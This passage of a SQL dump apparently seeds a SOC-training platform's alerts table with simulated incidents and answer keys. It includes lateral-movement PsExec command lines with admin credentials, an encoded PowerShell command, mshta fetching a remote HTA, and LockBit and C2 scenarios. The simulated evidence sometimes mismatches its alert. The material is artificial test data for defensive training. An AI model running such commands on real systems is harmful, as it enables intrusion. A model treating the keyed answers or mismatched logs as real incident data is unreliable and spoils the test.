4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:55:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB1AHAAZABhAHQAZQAtAGYAbwBsAGQAZQBy\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1636, 'Possible Lateral Movement via PsExec', 'high', 'Velociraptor', 'PsExec was executed from an internal system to another, possibly indicating lateral movement.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:30:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":\"192.168.1.85\",\"username\":\"attacker_user\",\"hostname\":\"attacker-pc\",\"request_body\":\"\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.85 -u admin -p password cmd.exe\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.85 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"PsExec used in lateral movement attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the initiating system.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the target system.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PsExec to run commands on another machine is indicative of lateral movement within the network.\"}', 'Advanced', 'IR', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.837Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:30:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"192.168.1.85\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"hostname\\\":\\\"attacker-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.85 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.837Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:30:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"192.168.1.85\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"hostname\\\":\\\"attacker-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.85 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.837Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:30:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"192.168.1.85\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"hostname\\\":\\\"attacker-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.85 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.837Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:30:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"192.168.1.85\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"hostname\\\":\\\"attacker-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.85 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.837Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:30:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"192.168.1.85\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"hostname\\\":\\\"attacker-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.85 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1637, 'False Positive: Automated Backup Process Triggered', 'low', 'Wazuh', 'An automated backup process was detected, which involves transferring large volumes of data to a remote storage server.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T17:24:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.200\",\"username\":\"backup_user\",\"hostname\":\"backup-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Trusted remote storage IP for backups.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal backup server IP.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer is part of a scheduled backup process, not unauthorized exfiltration.\"}', 'Advanced', 'IR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.839Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:24:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.839Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:24:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.839Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:24:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.839Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:24:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.839Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:24:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1638, 'Ransomware File Encryption Detected', 'critical', 'KAPE', 'A large number of files were encrypted on the server, with extensions changed to .lockbit. This is indicative of a ransomware attack.', 'Malware', 'T1486', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:50:18Z\",\"event_type\":\"file_modification\",\"src_ip\":\"192.168.1.95\",\"dst_ip\":\"\",\"username\":\"compromised_user\",\"hostname\":\"file-server\",\"request_body\":\"\",\"command_line\":\"\",\"file_hash\":\"abcd1234efgh5678ijkl\",\"file_extension\":\".lockbit\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with LockBit ransomware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.95\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised file server.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file encryption and use of the .lockbit extension confirm the presence of ransomware.\"}', 'Advanced', 'IR', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.841Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:50:18Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"src_ip\\\":\\\"192.168.1.95\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"file-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl\\\",\\\"file_extension\\\":\\\".lockbit\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.841Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:50:18Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"src_ip\\\":\\\"192.168.1.95\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"file-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl\\\",\\\"file_extension\\\":\\\".lockbit\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.841Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:50:18Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"src_ip\\\":\\\"192.168.1.95\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"file-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl\\\",\\\"file_extension\\\":\\\".lockbit\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.841Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:50:18Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"src_ip\\\":\\\"192.168.1.95\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"file-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl\\\",\\\"file_extension\\\":\\\".lockbit\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.841Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:50:18Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"src_ip\\\":\\\"192.168.1.95\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"file-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl\\\",\\\"file_extension\\\":\\\".lockbit\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1639, 'Unusual Network Traffic: Potential False Positive', 'medium', 'Firewall', 'Anomalous network traffic was detected, possibly related to legitimate software updates.', 'Suspicious Activity', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:12:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.110\",\"dst_ip\":\"198.51.100.101\",\"username\":\"update_user\",\"hostname\":\"update-client\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP associated with trusted software update services.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.110\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of a client machine performing updates.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"The network traffic appears to be related to legitimate software updates, not malicious activity.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1640, 'Unauthorized PsExec Execution Detected', 'high', 'FTK', 'PsExec was used to execute a process on a remote host, indicating potential lateral movement.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:37:29Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.120\",\"dst_ip\":\"192.168.1.125\",\"username\":\"hacker_user\",\"hostname\":\"compromised-pc\",\"request_body\":\"\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.125 -u admin -p password notepad.exe\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.125 -u admin -p password notepad.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"PsExec used for remote execution in lateral movement attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.125\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted machine.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec is indicative of lateral movement within the network, used here to execute commands on a remote server.\"}', 'Advanced', 'IR', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.845Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:37:29Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"192.168.1.125\\\",\\\"username\\\":\\\"hacker_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.125 -u admin -p password notepad.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.845Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:37:29Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"192.168.1.125\\\",\\\"username\\\":\\\"hacker_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.125 -u admin -p password notepad.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.845Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:37:29Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"192.168.1.125\\\",\\\"username\\\":\\\"hacker_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.125 -u admin -p password notepad.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.845Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:37:29Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"192.168.1.125\\\",\\\"username\\\":\\\"hacker_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.125 -u admin -p password notepad.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.845Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:37:29Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"192.168.1.125\\\",\\\"username\\\":\\\"hacker_user\\\",\\\"hostname\\\":\\\"compromised-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.125 -u admin -p password notepad.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1641, 'False Positive: Legitimate Use of MSHTA', 'low', 'KAPE', 'MSHTA.exe execution detected, but upon investigation, it was used for legitimate automation tasks.', 'Suspicious Activity', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.130\",\"dst_ip\":\"\",\"username\":\"automation_user\",\"hostname\":\"automation-pc\",\"request_body\":\"\",\"command_line\":\"mshta.exe \\\"http://intranet.example.com/automation.hta\\\"\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta.exe \\\"http://intranet.example.com/automation.hta\\\"\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"HTA used for legitimate automation tasks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.130\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the automation machine.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"MSHTA was utilized for a legitimate purpose, related to internal automation, not malicious activity.\"}', 'Advanced', 'IR', 7, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.130\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"automation_user\\\",\\\"hostname\\\":\\\"automation-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"mshta.exe 
\\\\\\\"http://intranet.example.com/automation.hta\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.130\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"automation_user\\\",\\\"hostname\\\":\\\"automation-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"mshta.exe \\\\\\\"http://intranet.example.com/automation.hta\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.130\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"automation_user\\\",\\\"hostname\\\":\\\"automation-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"mshta.exe \\\\\\\"http://intranet.example.com/automation.hta\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.130\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"automation_user\\\",\\\"hostname\\\":\\\"automation-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"mshta.exe \\\\\\\"http://intranet.example.com/automation.hta\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.847Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.130\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"automation_user\\\",\\\"hostname\\\":\\\"automation-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"mshta.exe \\\\\\\"http://intranet.example.com/automation.hta\\\\\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1642, 'Suspicious Network Connection Detected', 'high', 'Splunk', 'A network connection to a known C2 server was detected from an internal machine, suggesting potential compromise.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:42:31Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.140\",\"dst_ip\":\"203.0.113.102\",\"username\":\"malicious_user\",\"hostname\":\"infected-pc\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP involved in multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.140\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised 